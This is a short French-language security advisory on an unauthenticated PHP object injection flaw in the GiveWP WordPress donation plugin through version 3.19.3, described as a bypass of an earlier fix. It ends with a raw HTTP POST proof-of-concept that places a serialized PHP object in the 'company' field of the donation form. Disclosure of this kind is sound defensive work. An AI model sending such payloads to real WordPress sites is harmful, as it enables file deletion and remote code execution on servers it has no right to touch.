
GiveWP – Plugin de don et plateforme de collecte de fonds <= 3.19.3 - Injection d'objet PHP non authentifié
GiveWP – Plugin de don et plateforme de collecte de fonds <= 3.19.3 - Injection d'objet PHP non authentifiée
Le plugin GiveWP – Donation Plugin and Fundraising Platform pour WordPress est vulnérable à l'injection d'objet PHP dans toutes les versions jusqu'à 3.19.3 inclus via la désérialisation d'entrée non fiable du formulaire de don via le paramètre 'company'. Cela permet à des attaquants non authentifiés d'injecter un objet PHP. La présence supplémentaire d'une chaîne POP permet aux attaquants de supprimer des fichiers arbitraires sur le serveur, ce qui rend possible l'exécution de code à distance. Veuillez noter que cela couvre un contournement du correctif pour CVE-2024-12877.
POST /?givewp-route=donate&givewp-route-signature=[SIGNATURE]&givewp-route-signature-id=givewp-donate&givewp-route-signature-expiration=[EXPIRY] HTTP/1.1
Host: kubernetes.docker.internal:8929
Content-Type: application/x-www-form-urlencoded
Content-Length: 163
amount=10¤cy=USD&gatewayId=manual&formId=90&company=O:20:"PHP_Object_Injection":0:{}&firstName=Test&[email protected]&donationType=single&donationBirthday=